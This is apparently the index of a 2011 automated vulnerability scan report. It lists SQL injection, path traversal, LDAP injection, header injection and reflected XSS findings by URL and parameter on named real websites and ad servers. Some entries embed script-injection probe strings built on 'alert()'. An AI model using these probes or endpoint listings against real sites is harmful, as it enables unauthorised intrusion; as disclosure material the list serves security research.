Path Traversal, SQL Injection, HTTP Header Injection, Reflected XSS, DORK, GHDB, Report

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Apr 21 14:40:01 CDT 2011.


Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.


1. SQL injection

1.1. http://ad.amgdgt.com/ads/ [name of an arbitrarily supplied request parameter]

1.2. http://ad.doubleclick.net/adi/martindale.ll.stateresults.dart/ [User-Agent HTTP header]

1.3. http://googleads.g.doubleclick.net/pagead/ads [id cookie]

1.4. http://googleads.g.doubleclick.net/pagead/ads [lmt parameter]

1.5. http://googleads.g.doubleclick.net/pagead/ads [output parameter]

1.6. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter]

1.7. http://googleads.g.doubleclick.net/pagead/ads [u_h parameter]

1.8. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

1.9. http://googleads.g.doubleclick.net/pagead/ads [w parameter]

1.10. http://visitordrive.com/evTracker/evtracker.php [_evacct parameter]

1.11. http://visitordrive.com/evTracker/services/keywords.php [edate parameter]

1.12. http://visitordrive.com/evTracker/services/keywords.php [sdate parameter]

1.13. http://www.curtis.com/emaildisclaimer.cfm [CFID cookie]

1.14. http://www.curtis.com/emaildisclaimer.cfm [CFTOKEN cookie]

1.15. http://www.curtis.com/emaildisclaimer.cfm [REST URL parameter 1]

1.16. http://www.curtis.com/emaildisclaimer.cfm [__utma cookie]

1.17. http://www.curtis.com/emaildisclaimer.cfm [__utmb cookie]

1.18. http://www.curtis.com/emaildisclaimer.cfm [__utmc cookie]

1.19. http://www.curtis.com/emaildisclaimer.cfm [__utmz cookie]

1.20. http://www.curtis.com/emaildisclaimer.cfm [sifrFetch cookie]

1.21. http://www.curtis.com/favicon.ico [CFID cookie]

1.22. http://www.curtis.com/favicon.ico [CFTOKEN cookie]

1.23. http://www.curtis.com/favicon.ico [REST URL parameter 1]

1.24. http://www.curtis.com/favicon.ico [__utma cookie]

1.25. http://www.curtis.com/favicon.ico [__utmb cookie]

1.26. http://www.curtis.com/favicon.ico [__utmc cookie]

1.27. http://www.curtis.com/favicon.ico [__utmz cookie]

1.28. http://www.curtis.com/favicon.ico [sifrFetch cookie]

1.29. http://www.curtis.com/flash/curtis.swf [REST URL parameter 1]

1.30. http://www.curtis.com/flash/curtis.swf [REST URL parameter 2]

1.31. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 1]

1.32. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 2]

1.33. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 3]

1.34. http://www.curtis.com/scripts/carousel/getimages.cfm [CFID cookie]

1.35. http://www.curtis.com/scripts/carousel/getimages.cfm [CFTOKEN cookie]

1.36. http://www.curtis.com/scripts/carousel/getimages.cfm [REST URL parameter 3]

1.37. http://www.curtis.com/scripts/carousel/getimages.cfm [doctype parameter]

1.38. http://www.curtis.com/scripts/carousel/getimages.cfm [first_last_buttons parameter]

1.39. http://www.curtis.com/scripts/carousel/getimages.cfm [first_slide_is_intro parameter]

1.40. http://www.curtis.com/scripts/carousel/getimages.cfm [hover_next_prev_buttons parameter]

1.41. http://www.curtis.com/scripts/carousel/getimages.cfm [name of an arbitrarily supplied request parameter]

1.42. http://www.curtis.com/scripts/carousel/getimages.cfm [next_prev_buttons parameter]

1.43. http://www.curtis.com/scripts/carousel/getimages.cfm [pause_button parameter]

1.44. http://www.curtis.com/scripts/carousel/getimages.cfm [sifrFetch cookie]

1.45. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_buttons parameter]

1.46. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_captions parameter]

1.47. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_directory parameter]

1.48. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_links parameter]

1.49. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_number_display parameter]

1.50. http://www.curtis.com/scripts/carousel/getimages.cfm [water_mark parameter]

1.51. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 1]

1.52. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 2]

1.53. http://www.curtis.com/sifr3/garamond.swf [REST URL parameter 1]

1.54. http://www.curtis.com/sifr3/garamond.swf [REST URL parameter 2]

1.55. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 1]

1.56. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 2]

1.57. http://www.curtis.com/sitecontent.cfm [CFID cookie]

1.58. http://www.curtis.com/sitecontent.cfm [CFTOKEN cookie]

1.59. http://www.curtis.com/sitecontent.cfm [REST URL parameter 1]

1.60. http://www.curtis.com/sitecontent.cfm [__utma cookie]

1.61. http://www.curtis.com/sitecontent.cfm [__utmb cookie]

1.62. http://www.curtis.com/sitecontent.cfm [__utmc cookie]

1.63. http://www.curtis.com/sitecontent.cfm [__utmz cookie]

1.64. http://www.curtis.com/sitecontent.cfm [sifrFetch cookie]

1.65. http://www.friedfrank.com/ [__utma cookie]

1.66. http://www.friedfrank.com/ [__utmz cookie]

1.67. http://www.friedfrank.com/favicon.ico [REST URL parameter 1]

1.68. http://www.friedfrank.com/flash/perpetua.swf [REST URL parameter 1]

1.69. http://www.friedfrank.com/index.cfm [CFID cookie]

1.70. http://www.friedfrank.com/index.cfm [CFTOKEN cookie]

1.71. http://www.friedfrank.com/index.cfm [JSMOBILE cookie]

1.72. http://www.friedfrank.com/index.cfm [REST URL parameter 1]

1.73. http://www.friedfrank.com/index.cfm [__utma cookie]

1.74. http://www.friedfrank.com/index.cfm [__utmb cookie]

1.75. http://www.friedfrank.com/index.cfm [__utmc cookie]

1.76. http://www.friedfrank.com/index.cfm [__utmz cookie]

1.77. http://www.longislanderotic.com/forum [name of an arbitrarily supplied request parameter]

1.78. http://www.millerwelds.com/about/ [REST URL parameter 1]

1.79. http://www.millerwelds.com/about/ [name of an arbitrarily supplied request parameter]

1.80. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]

1.81. http://www.millerwelds.com/about/certifications.html [REST URL parameter 2]

1.82. http://www.millerwelds.com/about/certifications.html [name of an arbitrarily supplied request parameter]

1.83. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]

1.84. http://www.millerwelds.com/financing/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter]

1.85. http://www.millerwelds.com/financing/ [REST URL parameter 1]

1.86. http://www.millerwelds.com/financing/ [int_campaign parameter]

1.87. http://www.millerwelds.com/financing/ [int_content parameter]

1.88. http://www.millerwelds.com/financing/ [int_medium parameter]

1.89. http://www.millerwelds.com/financing/ [int_source parameter]

1.90. http://www.millerwelds.com/financing/ [name of an arbitrarily supplied request parameter]

1.91. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]

1.92. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]

1.93. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

1.94. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]

1.95. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

1.96. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]

1.97. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

1.98. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]

1.99. http://www.millerwelds.com/landing/drive/ [REST URL parameter 1]

1.100. http://www.millerwelds.com/landing/drive/ [REST URL parameter 2]

1.101. http://www.millerwelds.com/landing/drive/ [name of an arbitrarily supplied request parameter]

1.102. http://www.millerwelds.com/landing/drive/ [utm_campaign parameter]

1.103. http://www.millerwelds.com/landing/drive/ [utm_content parameter]

1.104. http://www.millerwelds.com/landing/drive/ [utm_medium parameter]

1.105. http://www.millerwelds.com/landing/drive/ [utm_source parameter]

1.106. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 6]

1.107. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]

1.108. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 9]

1.109. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]

1.110. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]

1.111. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 2]

1.112. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]

1.113. http://www.millerwelds.com/products/accessories/ [REST URL parameter 2]

1.114. http://www.millerwelds.com/products/accessories/ [name of an arbitrarily supplied request parameter]

1.115. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]

1.116. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 2]

1.117. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 3]

1.118. http://www.millerwelds.com/products/accessories/international/ [name of an arbitrarily supplied request parameter]

1.119. http://www.millerwelds.com/resources/ [REST URL parameter 1]

1.120. http://www.millerwelds.com/resources/ [name of an arbitrarily supplied request parameter]

1.121. http://www.millerwelds.com/results/blog/ [REST URL parameter 1]

1.122. http://www.millerwelds.com/service/ [REST URL parameter 1]

1.123. http://www.millerwelds.com/service/ [name of an arbitrarily supplied request parameter]

1.124. http://www.millerwelds.com/wheretobuy/ [REST URL parameter 1]

1.125. http://www.millerwelds.com/wheretobuy/ [name of an arbitrarily supplied request parameter]

1.126. http://www.socialfollow.com/button/ [b parameter]

1.127. http://www.socialfollow.com/button/image/ [b parameter]

2. File path traversal

2.1. http://www.rockyou.com/fxtext/fxtext-create.php [lang cookie]

2.2. http://www.rockyou.com/show_my_gallery.php [lang cookie]

3. LDAP injection

3.1. http://209.234.249.173/External/Application/Advertising/d0daadf2-a2dd-452d-97ab-1e94229fd41a/ [REST URL parameter 3]

3.2. http://209.234.249.173/External/Application/Advertising/d0daadf2-a2dd-452d-97ab-1e94229fd41a/ [REST URL parameter 4]

3.3. http://209.234.249.173/External/Application/BaseURL/ [REST URL parameter 3]

3.4. http://209.234.249.173/External/Application/Beacon/ [REST URL parameter 3]

3.5. http://209.234.249.173/External/Application/Metrics/Actions/ [REST URL parameter 3]

3.6. http://209.234.249.173/External/Application/Session/2F-E1-34-D1-73-5E-0A-2B-AF-56-17-42-E6-B0-67-2A/ [REST URL parameter 3]

3.7. http://209.234.249.173/External/Application/Session/2F-E1-34-D1-73-5E-0A-2B-AF-56-17-42-E6-B0-67-2A/ [REST URL parameter 4]

3.8. http://209.234.249.173/External/Application/Session/3E-90-85-0C-C0-0A-28-B7-CC-60-54-AD-8E-9E-5B-48/ [REST URL parameter 3]

3.9. http://209.234.249.173/External/Application/Session/3E-90-85-0C-C0-0A-28-B7-CC-60-54-AD-8E-9E-5B-48/ [REST URL parameter 4]

3.10. http://209.234.249.173/External/Application/Session/D3-90-3B-AA-80-CE-74-CA-DB-71-B3-A9-83-81-75-0B/ [REST URL parameter 3]

3.11. http://209.234.249.173/External/Application/Session/D3-90-3B-AA-80-CE-74-CA-DB-71-B3-A9-83-81-75-0B/ [REST URL parameter 4]

3.12. http://209.234.249.173/External/Channel/Playlist/2c3b384a-3efd-4b2c-b6ea-5e7c400e2126/ [REST URL parameter 4]

3.13. http://209.234.249.173/External/MediaItem/d0daadf2-a2dd-452d-97ab-1e94229fd41a/AdPositions/ [REST URL parameter 3]

3.14. http://altfarm.mediaplex.com/ad/bn/8742-48471-18339-27 [mpt parameter]

3.15. http://counter.rewardsnetwork.com/cm [ci parameter]

3.16. http://www.martindale.com/all/c-england/all-lawyers-4.htm [op397mdcsearchresultsliid cookie]

3.17. http://www.martindale.com/all/c-england/all-lawyers-5.htm [c parameter]

3.18. http://www.martindale.com/all/c-england/all-lawyers-7.htm [c parameter]

4. HTTP header injection

4.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

4.2. http://ad.doubleclick.net/ad/N3905.291893.COXDIGITALSOLUTIONS/B5343548 [REST URL parameter 1]

4.3. http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper [REST URL parameter 1]

4.4. http://ad.doubleclick.net/adi/martindale.ll.stateresults.dart/ [REST URL parameter 1]

4.5. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Leaderboard_RON [REST URL parameter 1]

4.6. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Sky_RON [REST URL parameter 1]

4.7. http://ad.doubleclick.net/getcamphist [REST URL parameter 1]

4.8. http://ad.doubleclick.net/getcamphist [src parameter]

4.9. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 1]

4.10. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 2]

4.11. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 3]

4.12. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 1]

4.13. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 2]

4.14. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 3]

4.15. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [S cookie]

4.16. http://nike.112.2o7.net/b/ss/nikeall/1/H.22.1/s25785419596359 [vmf parameter]

5. Cross-site scripting (reflected)

5.1. http://ads.adxpose.com/ads/ads.js [uid parameter]

5.2. http://btilelog.access.mapquest.com/tilelog/transaction [transaction parameter]

5.3. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

5.4. http://digg.com/submit [REST URL parameter 1]

5.5. http://ds.addthis.com/red/psi/sites/vasco.com/p.json [callback parameter]

5.6. http://ds.addthis.com/red/psi/sites/www.curtis.com/p.json [callback parameter]

5.7. http://event.adxpose.com/event.flow [uid parameter]

5.8. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.9. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

5.10. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

5.11. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

5.12. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

5.13. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

5.14. http://jqueryui.com/themeroller/css/parseTheme.css.php [c95d2 parameter]

5.15. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter]

5.16. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter]

5.17. http://mochibot.com/my/core.swf [f parameter]

5.18. http://mochibot.com/my/core.swf [mv parameter]

5.19. http://mochibot.com/my/core.swf [sb parameter]

5.20. http://mochibot.com/my/core.swf [swfid parameter]

5.21. http://widgets.digg.com/buttons/count [url parameter]

5.22. http://www.arnoldporter.com/industries.cfm [name of an arbitrarily supplied request parameter]

5.23. http://www.arnoldporter.com/industries.cfm [nsextt parameter]

5.24. http://www.arnoldporter.com/industries.cfm [u parameter]

5.25. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

5.26. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]

5.27. http://www.curtis.com/emaildisclaimer.cfm [itemID parameter]

5.28. http://www.curtis.com/emaildisclaimer.cfm [itemType parameter]

5.29. http://www.curtis.com/sitecontent.cfm [name of an arbitrarily supplied request parameter]

5.30. http://www.faegre.co.uk/11572 [REST URL parameter 1]

5.31. http://www.faegre.co.uk/11572 [name of an arbitrarily supplied request parameter]

5.32. http://www.faegre.co.uk/59 [REST URL parameter 1]

5.33. http://www.faegre.co.uk/59 [name of an arbitrarily supplied request parameter]

5.34. http://www.faegre.co.uk/bios [REST URL parameter 1]

5.35. http://www.faegre.co.uk/bios [name of an arbitrarily supplied request parameter]

5.36. http://www.faegre.co.uk/community [REST URL parameter 1]

5.37. http://www.faegre.co.uk/community [name of an arbitrarily supplied request parameter]

5.38. http://www.faegre.co.uk/eventtypes [REST URL parameter 1]

5.39. http://www.faegre.co.uk/eventtypes [name of an arbitrarily supplied request parameter]

5.40. http://www.faegre.co.uk/favicon.ico [REST URL parameter 1]

5.41. http://www.faegre.co.uk/getdoc.aspx [REST URL parameter 1]

5.42. http://www.faegre.co.uk/index.aspx [REST URL parameter 1]

5.43. http://www.faegre.co.uk/jscripts.js [REST URL parameter 1]

5.44. http://www.faegre.co.uk/rankingawards [REST URL parameter 1]

5.45. http://www.faegre.co.uk/rankingawards [name of an arbitrarily supplied request parameter]

5.46. http://www.faegre.co.uk/showlocation.aspx [REST URL parameter 1]

5.47. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]

5.48. http://www.friedfrank.com/ [name of an arbitrarily supplied request parameter]

5.49. http://www.friedfrank.com/index.cfm [more parameter]

5.50. http://www.friedfrank.com/index.cfm [name of an arbitrarily supplied request parameter]

5.51. http://www.humaniplex.com/blogs/ [name of an arbitrarily supplied request parameter]

5.52. http://www.humaniplex.com/classifieds/ [name of an arbitrarily supplied request parameter]

5.53. http://www.humaniplex.com/clubs/list [REST URL parameter 2]

5.54. http://www.humaniplex.com/clubs/list [name of an arbitrarily supplied request parameter]

5.55. http://www.humaniplex.com/flirts/ [name of an arbitrarily supplied request parameter]

5.56. http://www.humaniplex.com/index.html [name of an arbitrarily supplied request parameter]

5.57. http://www.humaniplex.com/mingle [name of an arbitrarily supplied request parameter]

5.58. http://www.humaniplex.com/mingle/ [name of an arbitrarily supplied request parameter]

5.59. http://www.humaniplex.com/profiles/ [name of an arbitrarily supplied request parameter]

5.60. http://www.humaniplex.com/tos/site.html [qs parameter]

5.61. http://www.humaniplex.com/tos/site.html [qs parameter]

5.62. http://www.humaniplex.com/user_tools/forgot_password/ [name of an arbitrarily supplied request parameter]

5.63. http://www.humaniplex.com/user_tools/join/ [name of an arbitrarily supplied request parameter]

5.64. http://www.leaseweb.com/en [REST URL parameter 1]

5.65. http://www.leaseweb.com/en/shopping-cart [REST URL parameter 1]

5.66. http://www.leaseweb.com/en/shopping-cart [REST URL parameter 2]

5.67. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 1]

5.68. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 2]

5.69. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 3]

5.70. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 1]

5.71. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 2]

5.72. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 3]

5.73. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 1]

5.74. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 2]

5.75. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 3]

5.76. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 4]

5.77. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 5]

5.78. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [name of an arbitrarily supplied request parameter]

5.79. http://www.leaseweb.com/flash/lsw_banner_hp.swf [REST URL parameter 1]

5.80. http://www.leaseweb.com/flash/lsw_banner_hp.swf [REST URL parameter 2]

5.81. http://www.leaseweb.com/flash/lsw_product.swf [REST URL parameter 1]

5.82. http://www.leaseweb.com/flash/lsw_product.swf [REST URL parameter 2]

5.83. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 1]

5.84. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 2]

5.85. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 3]

5.86. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 1]

5.87. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 2]

5.88. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 3]

5.89. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 1]

5.90. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 2]

5.91. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 3]

5.92. http://www.leaseweb.com/osdd.xml [REST URL parameter 1]

5.93. http://www.leaseweb.com/xml/lsw_en_bannerhome.xml [REST URL parameter 1]

5.94. http://www.leaseweb.com/xml/lsw_en_bannerhome.xml [REST URL parameter 2]

5.95. https://www.leaseweb.com/en/shopping-cart [REST URL parameter 1]

5.96. https://www.leaseweb.com/en/shopping-cart [REST URL parameter 2]

5.97. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 1]

5.98. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 2]

5.99. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 3]

5.100. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 1]

5.101. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 2]

5.102. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 3]

5.103. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

5.104. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

5.105. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

5.106. http://www.martindale.com/Results.aspx [ft parameter]

5.107. http://www.martindale.com/Results.aspx [ft parameter]

5.108. http://www.martindale.com/Results.aspx [hid parameter]

5.109. http://www.martindale.com/Results.aspx [sh parameter]

5.110. http://www.millerwelds.com/about/ [REST URL parameter 1]

5.111. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]

5.112. http://www.millerwelds.com/financing/ [REST URL parameter 1]

5.113. http://www.millerwelds.com/financing/ [int_campaign parameter]

5.114. http://www.millerwelds.com/financing/ [int_content parameter]

5.115. http://www.millerwelds.com/financing/ [int_medium parameter]

5.116. http://www.millerwelds.com/financing/ [int_source parameter]

5.117. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

5.118. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

5.119. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

5.120. http://www.millerwelds.com/landing/drive/ [REST URL parameter 1]

5.121. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]

5.122. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]

5.123. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]

5.124. http://www.millerwelds.com/resources/ [REST URL parameter 1]

5.125. http://www.millerwelds.com/results/blog/ [REST URL parameter 1]

5.126. http://www.millerwelds.com/service/ [REST URL parameter 1]

5.127. http://www.millerwelds.com/wheretobuy/ [REST URL parameter 1]

5.128. http://www.mypowerblock.com/xn/loader [r parameter]

5.129. http://www.nike.com/nikeos/p/nikegolf/en_US/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E parameter]

5.130. http://www.nike.com/nikeos/p/nikegolf/en_US/ [name of an arbitrarily supplied request parameter]

5.131. http://www.nike.com/nikeos/p/usnikefootball/lang_LO/utilities/compress [includes parameter]

5.132. http://www.nike.com/nsl/services/user/isloggedin [REST URL parameter 4]

5.133. http://www.nike.com/nsl/services/user/isloggedin [callback parameter]

5.134. http://www.powerblocktv.com/site3 [name of an arbitrarily supplied request parameter]

5.135. http://www.powerblocktv.com/site3 [name of an arbitrarily supplied request parameter]

5.136. http://www.powerblocktv.com/site3/ [name of an arbitrarily supplied request parameter]

5.137. http://www.powerblocktv.com/site3/ [name of an arbitrarily supplied request parameter]

5.138. http://www.powerblocktv.com/site3/fpss/templates/pb-temp/template_css.php [h parameter]

5.139. http://www.powerblocktv.com/site3/fpss/templates/pb-temp/template_css.php [w parameter]

5.140. http://www.powerblocktv.com/site3/index.php/xtreme [name of an arbitrarily supplied request parameter]

5.141. http://www.powerblocktv.com/site3/index.php/xtreme [name of an arbitrarily supplied request parameter]

5.142. http://www.rockyou.com/developer/opensocial/opensocial-css.php [name of an arbitrarily supplied request parameter]

5.143. http://www.rockyou.com/developer/opensocial/opensocial-css.php [title parameter]

5.144. http://www.rockyou.com/login/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E parameter]

5.145. http://www.rockyou.com/login/ [name of an arbitrarily supplied request parameter]

5.146. http://www.rockyou.com/login/index.php [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E parameter]

5.147. http://www.rockyou.com/login/index.php [name of an arbitrarily supplied request parameter]

5.148. http://www.rockyou.com/show_my_gallery.php [instanceid parameter]

5.149. http://www.socialfollow.com/button/ [b parameter]

5.150. http://www.socialfollow.com/button/css/ [b parameter]

5.151. http://www.socialfollow.com/button/css/ [socialSites parameter]

5.152. http://www.socialfollow.com/login.php [tEmail parameter]

5.153. http://www.viglink.com/users/login [ar parameter]

5.154. https://www.viglink.com/users/login [ar parameter]

5.155. http://www.ypg.com/en [REST URL parameter 1]

5.156. http://www.ypg.com/en/ [REST URL parameter 1]

5.157. http://www.ypg.com/en/contact-us [REST URL parameter 1]

5.158. http://www.ypg.com/en/contact-us [REST URL parameter 2]

5.159. http://www.ypg.com/en/contact-us [name of an arbitrarily supplied request parameter]

5.160. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 1]

5.161. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 2]

5.162. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 3]

5.163. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]

5.164. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]

5.165. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]

5.166. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]

5.167. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [name of an arbitrarily supplied request parameter]

5.168. http://www.ypg.com/en/images/loading.gif [REST URL parameter 1]

5.169. http://www.ypg.com/en/images/loading.gif [REST URL parameter 2]

5.170. http://www.ypg.com/en/images/loading.gif [REST URL parameter 3]

5.171. http://www.ypg.com/en/images/loading.gif [name of an arbitrarily supplied request parameter]

5.172. http://www.ypg.com/images/imageresizer.php [REST URL parameter 1]

5.173. http://www.ypg.com/images/imageresizer.php [REST URL parameter 2]

5.174. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 1]

5.175. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 2]

5.176. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 3]

5.177. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 4]

5.178. http://www.zoomerang.com/Survey/TinyMCE.ashx [font parameter]

5.179. http://mochibot.com/my/core.swf [Referer HTTP header]

5.180. http://www.arnoldporter.com/ [Referer HTTP header]

5.181. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

5.182. http://www.arnoldporter.com/experience.cfm [Referer HTTP header]

5.183. http://www.arnoldporter.com/industries.cfm [Referer HTTP header]

5.184. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

5.185. http://www.arnoldporter.com/practices.cfm [Referer HTTP header]

5.186. http://www.arnoldporter.com/press_releases.cfm [Referer HTTP header]

5.187. http://www.arnoldporter.com/publications.cfm [Referer HTTP header]

5.188. http://www.arnoldporter.com/search.cfm [Referer HTTP header]

5.189. http://www.friedfrank.com/ [User-Agent HTTP header]

5.190. http://www.friedfrank.com/includes/vcard.cfm [User-Agent HTTP header]

5.191. http://www.friedfrank.com/index.cfm [User-Agent HTTP header]

5.192. http://www.friedfrank.com/printfriendly.cfm [User-Agent HTTP header]

6. Flash cross-domain policy

6.1. http://209.234.249.173/crossdomain.xml

6.2. http://adserver.adtechus.com/crossdomain.xml

6.3. http://beacon.securestudies.com/crossdomain.xml

6.4. http://c.brightcove.com/crossdomain.xml

6.5. http://r.unicornmedia.com/crossdomain.xml

6.6. http://rcv-srv86.inplay.tubemogul.com/crossdomain.xml

6.7. http://receive.inplay.tubemogul.com/crossdomain.xml

6.8. http://adadvisor.net/crossdomain.xml

6.9. http://apps.rockyou.com/crossdomain.xml

6.10. http://www.rockyou.com/crossdomain.xml

6.11. http://mypowerblock.ning.com/crossdomain.xml

6.12. http://www.mypowerblock.com/crossdomain.xml

7. Silverlight cross-domain policy

8. Cleartext submission of password

8.1. http://community.martindale.com/groups/groupdirectory.aspx

8.2. http://community.martindale.com/upgrade-your-connected-account.aspx

8.3. http://digg.com/submit

